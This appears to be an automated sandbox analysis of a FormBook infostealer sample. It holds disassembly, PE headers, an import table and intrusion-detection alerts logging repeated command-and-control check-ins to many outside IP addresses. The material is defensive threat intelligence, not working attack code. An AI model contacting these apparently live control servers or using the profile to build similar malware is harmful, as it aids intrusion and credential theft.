                                                                                          int3
                                                                                          int3
                                                                                          push edi
                                                                                          push esi
                                                                                          mov esi, dword ptr [esp+10h]
                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                          mov eax, ecx
                                                                                          mov edx, ecx
                                                                                          add eax, esi
                                                                                          cmp edi, esi
                                                                                          jbe 00007F6F286E737Ah
                                                                                          cmp edi, eax
                                                                                          jc 00007F6F286E76DEh
                                                                                          bt dword ptr [004C0158h], 01h
                                                                                          jnc 00007F6F286E7379h
                                                                                          rep movsb
                                                                                          jmp 00007F6F286E768Ch
                                                                                          cmp ecx, 00000080h
                                                                                          jc 00007F6F286E7544h
                                                                                          mov eax, edi
                                                                                          xor eax, esi
                                                                                          test eax, 0000000Fh
                                                                                          jne 00007F6F286E7380h
                                                                                          bt dword ptr [004BA370h], 01h
                                                                                          jc 00007F6F286E7850h
                                                                                          bt dword ptr [004C0158h], 00000000h
                                                                                          jnc 00007F6F286E751Dh
                                                                                          test edi, 00000003h
                                                                                          jne 00007F6F286E752Eh
                                                                                          test esi, 00000003h
                                                                                          jne 00007F6F286E750Dh
                                                                                          bt edi, 02h
                                                                                          jnc 00007F6F286E737Fh
                                                                                          mov eax, dword ptr [esi]
                                                                                          sub ecx, 04h
                                                                                          lea esi, dword ptr [esi+04h]
                                                                                          mov dword ptr [edi], eax
                                                                                          lea edi, dword ptr [edi+04h]
                                                                                          bt edi, 03h
                                                                                          jnc 00007F6F286E7383h
                                                                                          movq xmm1, qword ptr [esi]
                                                                                          sub ecx, 08h
                                                                                          lea esi, dword ptr [esi+08h]
                                                                                          movq qword ptr [edi], xmm1
                                                                                          lea edi, dword ptr [edi+08h]
                                                                                          test esi, 00000007h
                                                                                          je 00007F6F286E73D5h
                                                                                          bt esi, 03h
                                                                                          jnc 00007F6F286E7428h
                                                                                          movdqa xmm1, dqword ptr [esi+00h]
                                                                                          Programming Language:
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                          • [ASM] VS2012 UPD4 build 61030
                                                                                          • [RES] VS2012 UPD4 build 61030
                                                                                          • [LNK] VS2012 UPD4 build 61030
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5db24.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0xc40000x5db240x5dc00b42ddced81cbc35622ebce6ed3e599c2False0.9300364583333334data7.898955142760988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                          RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                          RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                          RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                          RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                          RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                          RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                          RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                          RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                          RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                          RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                          RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                          RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                          RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                          RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                          RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                          RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                          RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                          RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                          RT_RCDATA0xcc7b80x54e2bdata1.0003336295733856
                                                                                          RT_GROUP_ICON0x1215e40x76dataEnglishGreat Britain0.6610169491525424
                                                                                          RT_GROUP_ICON0x12165c0x14dataEnglishGreat Britain1.25
                                                                                          RT_GROUP_ICON0x1216700x14dataEnglishGreat Britain1.15
                                                                                          RT_GROUP_ICON0x1216840x14dataEnglishGreat Britain1.25
                                                                                          RT_VERSION0x1216980xdcdataEnglishGreat Britain0.6181818181818182
                                                                                          RT_MANIFEST0x1217740x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                          DLLImport
                                                                                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                          UxTheme.dllIsThemeActive
                                                                                          KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                          GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                          ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                          OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishGreat Britain
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-11-24T08:19:57.934086+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54977513.248.221.24380TCP
                                                                                          2024-11-24T08:20:15.190738+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54981338.54.112.22780TCP
                                                                                          2024-11-24T08:20:17.925091+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54981938.54.112.22780TCP
                                                                                          2024-11-24T08:20:20.628223+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54982838.54.112.22780TCP
                                                                                          2024-11-24T08:20:23.425972+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54983638.54.112.22780TCP
                                                                                          2024-11-24T08:20:31.034448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54985247.76.213.19780TCP
                                                                                          2024-11-24T08:20:33.690775+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54985847.76.213.19780TCP
                                                                                          2024-11-24T08:20:36.362609+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54986847.76.213.19780TCP
                                                                                          2024-11-24T08:20:39.097696+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54987547.76.213.19780TCP
                                                                                          2024-11-24T08:20:46.351229+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54989174.48.143.8280TCP
                                                                                          2024-11-24T08:20:48.960155+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54989774.48.143.8280TCP
                                                                                          2024-11-24T08:20:51.617592+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54990574.48.143.8280TCP
                                                                                          2024-11-24T08:20:54.303139+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54991274.48.143.8280TCP
                                                                                          2024-11-24T08:21:00.864255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54992713.248.169.4880TCP
                                                                                          2024-11-24T08:21:03.597769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54993513.248.169.4880TCP
                                                                                          2024-11-24T08:21:06.167057+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54994213.248.169.4880TCP
                                                                                          2024-11-24T08:21:08.930320+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54994813.248.169.4880TCP
                                                                                          2024-11-24T08:21:16.566182+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549965103.21.221.8780TCP
                                                                                          2024-11-24T08:21:19.270132+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549972103.21.221.8780TCP
                                                                                          2024-11-24T08:21:21.941010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549980103.21.221.8780TCP
                                                                                          2024-11-24T08:21:24.655094+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549987103.21.221.8780TCP
                                                                                          2024-11-24T08:21:32.910270+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499978.210.46.2180TCP
                                                                                          2024-11-24T08:21:35.644148+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499988.210.46.2180TCP
                                                                                          2024-11-24T08:21:38.302174+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499998.210.46.2180TCP
                                                                                          2024-11-24T08:21:41.021032+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500008.210.46.2180TCP
                                                                                          2024-11-24T08:21:47.613670+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001203.161.43.22880TCP
                                                                                          2024-11-24T08:21:50.386226+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002203.161.43.22880TCP
                                                                                          2024-11-24T08:21:53.080355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003203.161.43.22880TCP
                                                                                          2024-11-24T08:21:55.677808+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550004203.161.43.22880TCP
                                                                                          2024-11-24T08:22:02.229431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000513.248.169.4880TCP
                                                                                          2024-11-24T08:22:04.920227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000613.248.169.4880TCP
                                                                                          2024-11-24T08:22:07.541345+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000713.248.169.4880TCP
                                                                                          2024-11-24T08:22:10.256688+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000813.248.169.4880TCP
                                                                                          2024-11-24T08:22:17.018327+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009147.255.21.18780TCP
                                                                                          2024-11-24T08:22:19.677568+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010147.255.21.18780TCP
                                                                                          2024-11-24T08:22:22.390336+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011147.255.21.18780TCP
                                                                                          2024-11-24T08:22:25.056018+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550012147.255.21.18780TCP
                                                                                          2024-11-24T08:22:31.633087+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013172.67.159.6180TCP
                                                                                          2024-11-24T08:22:34.380153+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550014172.67.159.6180TCP
                                                                                          2024-11-24T08:22:37.059844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015172.67.159.6180TCP
                                                                                          2024-11-24T08:22:39.735023+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550016172.67.159.6180TCP
                                                                                          2024-11-24T08:22:46.817185+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017172.67.168.22880TCP
                                                                                          2024-11-24T08:22:49.487701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018172.67.168.22880TCP
                                                                                          2024-11-24T08:22:52.143905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019172.67.168.22880TCP
                                                                                          2024-11-24T08:22:54.926351+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550020172.67.168.22880TCP
                                                                                          2024-11-24T08:23:01.802045+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021194.58.112.17480TCP
                                                                                          2024-11-24T08:23:04.440140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022194.58.112.17480TCP
                                                                                          2024-11-24T08:23:07.116769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023194.58.112.17480TCP
                                                                                          2024-11-24T08:23:09.783841+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550024194.58.112.17480TCP
                                                                                          2024-11-24T08:23:16.435572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550025172.67.220.3680TCP
                                                                                          2024-11-24T08:23:19.516006+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550026172.67.220.3680TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 24, 2024 08:19:56.616873980 CET4977580192.168.2.513.248.221.243
                                                                                          Nov 24, 2024 08:19:56.736558914 CET804977513.248.221.243192.168.2.5
                                                                                          Nov 24, 2024 08:19:56.736650944 CET4977580192.168.2.513.248.221.243
                                                                                          Nov 24, 2024 08:19:56.752130985 CET4977580192.168.2.513.248.221.243
                                                                                          Nov 24, 2024 08:19:56.871625900 CET804977513.248.221.243192.168.2.5
                                                                                          Nov 24, 2024 08:19:57.933898926 CET804977513.248.221.243192.168.2.5
                                                                                          Nov 24, 2024 08:19:57.933960915 CET804977513.248.221.243192.168.2.5
                                                                                          Nov 24, 2024 08:19:57.934086084 CET4977580192.168.2.513.248.221.243
                                                                                          Nov 24, 2024 08:19:57.937459946 CET4977580192.168.2.513.248.221.243
                                                                                          Nov 24, 2024 08:19:58.057131052 CET804977513.248.221.243192.168.2.5
                                                                                          Nov 24, 2024 08:20:13.549930096 CET4981380192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:13.669511080 CET804981338.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:13.669610023 CET4981380192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:13.684988976 CET4981380192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:13.804502964 CET804981338.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:15.190737963 CET4981380192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:15.310678959 CET804981338.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:15.310945988 CET4981380192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:16.263905048 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:16.384191990 CET804981938.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:16.384278059 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:16.410785913 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:16.530921936 CET804981938.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:17.925091028 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:18.042802095 CET804981938.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:18.042972088 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:18.043021917 CET804981938.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:18.043108940 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:18.044589996 CET804981938.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:18.044647932 CET4981980192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:18.986689091 CET4982880192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:19.106342077 CET804982838.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:19.106487989 CET4982880192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:19.121660948 CET4982880192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:19.241416931 CET804982838.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:19.241455078 CET804982838.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:20.628222942 CET4982880192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:20.748099089 CET804982838.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:20.748203993 CET4982880192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:21.646886110 CET4983680192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:21.766597033 CET804983638.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:21.766813993 CET4983680192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:21.777203083 CET4983680192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:21.896723986 CET804983638.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:23.425554991 CET804983638.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:23.425915003 CET804983638.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:23.425971985 CET4983680192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:23.428486109 CET4983680192.168.2.538.54.112.227
                                                                                          Nov 24, 2024 08:20:23.547980070 CET804983638.54.112.227192.168.2.5
                                                                                          Nov 24, 2024 08:20:29.384924889 CET4985280192.168.2.547.76.213.197
